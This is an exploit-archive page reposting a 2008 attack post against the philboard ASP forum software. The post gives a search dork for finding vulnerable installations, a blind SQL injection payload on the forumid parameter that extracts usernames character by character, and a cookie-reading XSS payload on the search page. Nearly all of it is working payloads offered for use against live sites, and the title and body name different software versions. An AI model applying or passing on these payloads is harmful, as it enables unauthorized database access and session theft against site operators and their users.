[] NeoSense
E X P L O I T S
title author type platform port cve id

W1L3D4 philboard 1.2 - Blind SQL Injection / Cross-Site Scripting

Author: Bl@ckbe@rD
type: webapps
platform: php
port: 
date_added: 2008-06-26 
date_updated: 2016-11-24 
verified: 1 
codes: OSVDB-46569;CVE-2008-5193;OSVDB-46568;CVE-2008-5192 
tags: 
aliases:  
screenshot_url:  
application_url: 
> [+] Script Name     : philboard v 1.14 Multiple Remote Exploits

> |+| Team            : InjEct0r5

> [+] Author          : Bl@ckbe@rD ('Tunisian TerrorisT') ;

> [+] Contact         : blackbeard-sql[A.T]hotmail{.}fr ;

> [+] Dork            : Powered by v1.14 powered by philboard v1.14

> --//-->

> [+] Expl0iT :

> Remote SQL Injection :

> __--> http://www.dork.cc/[ScriptPath]/forum.asp?forumid=[SQL]

> Blind Way  : IIF((select%20mid(last(username),1,1)%20from%20(select%20top%2010%20username%20from%20users))='a',0,'Bingo')%00

> Remote XSS Exploit :

> __--> http://www.dork.co.il/[Script Path]/search.asp?searchterms=[XSS]

[XSS] --> <script>alert(document.cookie)</script>

# milw0rm.com [2008-06-27]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.